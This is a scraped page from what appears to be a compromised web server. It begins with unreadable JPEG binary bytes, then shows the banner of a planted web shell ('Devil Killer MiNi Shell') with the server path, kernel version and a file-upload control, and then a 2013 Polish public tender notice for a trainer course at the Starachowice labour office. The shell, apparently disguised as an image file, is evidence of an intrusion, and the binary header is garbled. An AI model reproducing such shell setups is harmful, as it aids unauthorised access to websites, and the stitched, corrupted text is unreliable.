JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/27061-N-2013.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia pn. Kurs trenerski dla 5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków EFS, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy 
w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
Znak sprawy: ZP/5/2013.</b><br>
<b>Numer ogłoszenia: 27061 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Kurs trenerski dla 5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków EFS, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy 
w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
Znak sprawy: ZP/5/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Kurs trenerski dla 5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy 
w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
Znak sprawy: ZP/5/2013. 
Kod zgodnie ze słownikiem CPV 80510000-2  

1.	Celem szkolenia jest nabycie kompetencji o umiejętnościach i technikach trenerskich oraz poznanie metod prowadzenia zajęć grupowych.  
2.	Program szkolenia musi zawierać następujące bloki tematyczne:
       - analiza potrzeb, formułowanie celów szkoleniowych,
       - przygotowanie sesji szkoleniowej,
       - prowadzenie szklenia,
       - ewaluacja szkolenia.
3.	Szkolenie ma być przeprowadzone w formie warsztatów aktywizujących uczestników.
4.	Szkolenie ma zostać zorganizowane i przeprowadzone do 26.04.2013 r.
5.	Liczba godzin szkolenia min 40, według szczegółowego programu szkolenia.
6.	Czas trwania szkolenia 5 dni.
7.	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. 
8.	Wymaga się, aby zajęcia odbywały się codziennie w dni powszednie.
9.	Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni ustawowo wolne od pracy.
10.	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
11.	Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
12.	Wykonawca zapewni odpowiednią kadrę szkoleniową. 
13.	Wykonawca zapewni opiekuna grupy oraz opracuje szczegółowy harmonogram szkolenia.
14.	Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego  przeprowadzenia szkolenia.
15.	Wykonawca zapewni w trakcie trwania szkolenia i w miejscu zakwaterowania oraz w przypadku  
 zorganizowania transportu dla uczestników szkolenia warunki zgodne z przepisami  
 bezpieczeństwa i higieny pracy. 
16.	Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej z organizacją szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.    
17.	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały szkoleniowe w formie skryptów, materiałów biurowych (przybory piśmienne, notatnik, itp.), pomoce dydaktyczne niezbędne do realizacji szkolenia oraz szczegółowy harmonogram szkolenia 
18.	Po zakończeniu szkolenia Wykonawca zamówienia wyda zaświadczenie zgodne 
z rozporządzeniem Ministra Edukacji Narodowej z dnia 11.01.2012 r,  oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
19.	Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
bliżej niż 20 km i nie dalej niż 300 km od granicy miasta Starachowice.
20.	Wykonawca zapewni przewóz dla 5 uczestników szkolenia z siedziby Zamawiającego tj. Starachowice ul. Radomska 76 do miejsca szkolenia i z powrotem lub pokryje koszty związane 
z dojazdem 5 uczestników szkolenia ze Starachowic do miejsca szkolenia i z powrotem.   
21.	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia od pierwszego do ostatniego dnia szkolenia, a w przypadku organizowania przez Wykonawcę przewozu dodatkowo na okres podróży. 
22.	Wykonawca zapewni 4 noclegi dla 5 osób skierowanych na szkolenie. 
23.	Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym lub pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych wyposażonych w pełny węzeł sanitarny.
24.	Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników  szkolenia (4 śniadania, 5 obiadów, 4 kolacje) oraz serwis kawowy podczas trwania zajęć. Posiłki mają być podawane w innej sali niż wykładowa przystosowanej do tego celu.  
25.	W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia szkolenia Wykonawca zapewni dodatkowy nocleg zgodny z w/w opisem, dodatkową kolację
w przeddzień szkolenia oraz śniadanie w dniu rozpoczęcia szkolenia. 
26.	Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników szkolenia lub 
w odległości nie większej niż 1 km od miejsca zakwaterowania. W przypadku gdy zajęcia  odbywać się będą w odległości większej niż 1 km od miejsca zakwaterowania uczestników Wykonawca zapewni transport na i z miejsca odbywania zajęć.  
27.	Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
28.  Zamawiający przewiduje:   
       - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
       prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
       której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
       zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
       kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
       Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
       przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza 
       zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez 
       Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
       ofercie. Powyższa zmiana wymaga akceptacji Zamawiającego po wcześniejszym pisemnym jego 
       powiadomieniu. W przypadku gdy zmiana ta następuje po podpisaniu umowy, zmiana ta wymaga 
      aneksowania umowy. Zamawiający przewiduje zmianę sprzętu technicznego wykorzystywanego 
      podczas przeprowadzania szkolenia określonego w załączniku oraz ofercie jednostki szkolącej pod   
      warunkiem, że wymieniony sprzęt znajdzie zastosowanie  podczas przeprowadzania tego 
      szkolenia. Zmiana ta wymaga jedynie akceptacji Zamawiającego.
      - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
      przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
      szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia 
      Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby 
      osób przeszkolonych i ceny jednostkowej).
      Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
      określonej w opisie przedmiotu zamówienia.
      Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
      w umowie. 
      W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
      zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
        - analiza potrzeb, formułowanie celów szkoleniowych,
       - przygotowanie sesji szkoleniowej,
       - prowadzenie szklenia,
       - ewaluacja szkolenia.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
  w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.
    e) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
          działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
          ewidencji działalności gospodarczej w formie oryginału lub kopii poświadczonej za zgodność 
          z oryginałem.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.
Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu dokona odbioru zadania zleconego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
  - załącznik nr 1 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością w okresie   
   ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
   krótszy - w tym okresie przynajmniej jednego szkolenia w temacie przedmiotu zamówienia.
- Ocena nastąpi na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w temacie 
   przedmiotu zamówienia. Dokumentem potwierdzającym przeprowadzenie z należytą starannością  
   w okresie ostatnich 3 lat przed upływem terminu składania ofert szkolenia może być dokument, 
   który jednoznacznie potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru 
   usługi szkoleniowej itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie 
   zamówienia przeprowadził szkolenie w temacie przedmiotu zamówienia. Dokument ten musi 
   zawierać termin przeprowadzenia tego szkolenia. 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
   - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
   - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym   
   zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 do SIWZ. W przypadku gdy 
   jednostka szkoląca w miejscu odbywania się szkolenia nie posiada własnej bazy szkoleniowej na 
   spełnienie warunku potencjał techniczny należy dołączyć dodatkowo np.: zobowiązanie do 
   współpracy, umowę przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej, w której winny 
   zostać określone: warunki lokalowe, wyposażenie sal do przeprowadzenia zajęć w sprzęt techniczny 
   oraz pomoce dydaktyczne. W przypadku braku tych zapisów w w/w dokumentach, informacje te 
   proszę zawrzeć w załączniku nr 2 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
    - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
    przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej realizację przedmiotu  
   zamówienia - załącznik nr 4 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument potwierdzający przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w temacie 
   przedmiotu zamówienia. Dokumentem potwierdzającym przeprowadzenie z należytą starannością  
   w okresie ostatnich 3 lat przed upływem terminu składania ofert szkolenia może być dokument, 
   który jednoznacznie potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru 
   usługi szkoleniowej itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie 
   zamówienia przeprowadził szkolenie w temacie przedmiotu zamówienia. Dokument ten musi 
   zawierać termin przeprowadzenia tego szkolenia. 
2. W przypadku gdy 
   jednostka szkoląca w miejscu odbywania się szkolenia nie posiada własnej bazy szkoleniowej na 
   spełnienie warunku potencjał techniczny należy dołączyć dodatkowo np.: zobowiązanie do 
   współpracy, umowę przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej, w której winny 
   zostać określone: warunki lokalowe, wyposażenie sal do przeprowadzenia zajęć w sprzęt techniczny 
   oraz pomoce dydaktyczne. W przypadku braku tych zapisów w w/w dokumentach, informacje te 
   proszę zawrzeć w załączniku nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 15</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt 
     stanowi załącznik Nr 7 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu  
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
    okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można  
    było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 
    30 dni od powzięcia wiadomości o tych okolicznościach.
    W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania  
    części umowy.
4.  Zamawiający przewiduje:   
    - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
    prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
    której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
    zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
    kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
    Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
    przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza 
    zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez 
    Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
    ofercie. Powyższa zmiana wymaga akceptacji Zamawiającego po wcześniejszym pisemnym jego 
    powiadomieniu. W przypadku gdy zmiana ta następuje po podpisaniu umowy, zmiana ta wymaga 
    aneksowania umowy.
   Zamawiający przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania 
   szkolenia określonego w załączniku oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony 
   sprzęt znajdzie zastosowanie podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie 
   akceptacji Zamawiającego.
   - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
    przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
    szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia 
    Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby 
    osób przeszkolonych i ceny jednostkowej). Przez cenę jednostkową należy rozumieć iloraz ceny 
    brutto oferty i liczby uczestników szkolenia określonej w opisie przedmiotu zamówienia.
    Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
    w umowie. 
    W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
    zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku. 
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
        - analiza potrzeb, formułowanie celów szkoleniowych,
       - przygotowanie sesji szkoleniowej,
       - prowadzenie szklenia,
       - ewaluacja szkolenia.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
  w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.
    e) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
